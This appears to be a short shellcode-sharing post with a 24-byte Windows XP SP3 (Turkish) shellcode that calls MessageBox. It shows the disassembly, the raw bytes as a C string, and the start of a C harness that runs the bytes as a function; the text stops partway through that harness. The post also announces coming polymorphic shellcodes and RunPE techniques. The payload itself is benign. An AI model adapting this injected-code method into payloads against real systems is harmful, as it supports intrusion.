win32/xp[TR] sp3 MessageBox - 24Bytes

2015-07-21 09:05:52

win32/xp[TR] sp3 MessageBox - 24Bytes

#Greetz : Bomberman&T-Rex
#Author : B3mB4m
#Proof :

I know there is nothing new.I wrote just to say "I am back" ..

-Coming soon-
arwin.c [v2] ..
Polymorphic shellcodes ..
Win7,Win8,Win10 shellcodes ..
RunPE & Migrate ? !!(If bomberman allowed hehe)

Stay tuned ! :)

Disassembly of section .text:

00401000 <_start>:
401000: 31 c0 xor %eax,%eax
401002: 50 push %eax
401003: 68 42 34 6d 7c push $0x7c6d3442
401008: 68 7c 42 33 6d push $0x6d33427c
40100d: 89 e1 mov %esp,%ecx
40100f: bb d4 29 86 7c mov $0x7c8629d4,%ebx
401014: 51 push %ecx
401015: 50 push %eax
401016: ff d3 call %ebx

#include <stdio.h>
#include <string.h>

char shellcode[] = "\x31\xc0\x50\x68\x42\x34\x6d\x7c\x68\x7c\x42\x33\x6d\x89\xe1\xbb\xd4\x29\x86\x7c\x51\x50\xff\xd3";

int main(int argc, char **argv){

int (*func)();
func = (int (*)()) shellcode;


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